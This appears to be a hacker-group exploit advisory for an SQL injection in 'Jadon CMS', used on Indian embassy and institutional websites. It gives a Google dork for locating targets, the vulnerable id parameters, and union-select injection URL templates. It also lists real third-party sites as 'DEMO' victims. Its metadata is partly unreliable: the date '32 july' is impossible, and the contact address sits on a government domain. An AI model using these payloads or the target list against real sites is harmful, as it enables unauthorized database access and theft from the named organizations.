###########################
# INDIAN EMBASSY Jadon CMS SQL INJECTION Vulnerability
###########################
=========================================================
[+] Title :- INDIAN EMBASSY Jadon CMS - SQL INJECTION
[+] Date :- 32 - july - 2016
[+] Vendor Homepage :- http://jadontech.com/
[+] Version :- All Versions
[+] Tested on :- Linux - Windows - Mac
[+] Category :- webapps
[+] Google Dorks :- "Designed by Jadon Technologies" or inurl:/news_detail.php?in_id= site:.in
[+] Exploit Author :- Natasya A.K.A codestack
[+] Team name :- codegirl , girls-silent , anongirls
[+] Official Website :- www.codegirlmovie.com
[+] Available :- sql injection cheat sheet | sql injection Havij
[+] Greedz to :- Indonesian People | Keep-silent | Hmei7
[+] Contact :- admin@kpu.go.id
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id, newsid=
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL Injection via Multiple Php Files causing an SQL error
[+] SQL vulnerable File :- /home/DOMAIN/public_html/XXX.php
[+] POC :- http://127.0.0.1/news_detail.php?id=[SQL]'
The sql Injection web vulnerability can be be exploited by remote attackers without any privilege of web-application user account or user interaction.
http://www.[WEBSITE].com/news_detail.php?id=63' order by [SQL INJECTION]--+
http://www.[WEBSITE].com/news_detail.php?id=63' union all select [SQL INJECTION]--+
[+] DEMO :- http://www.jecrcudml.edu.in/news_detail.php?id=17'
http://www.embindia.org/news_detail.php?id=21
http://eoilisbon.in/news_detail.php?id=6
=======================================================
###########################
# Discovered Analyze by : Ternate-Labs Pentesting
###########################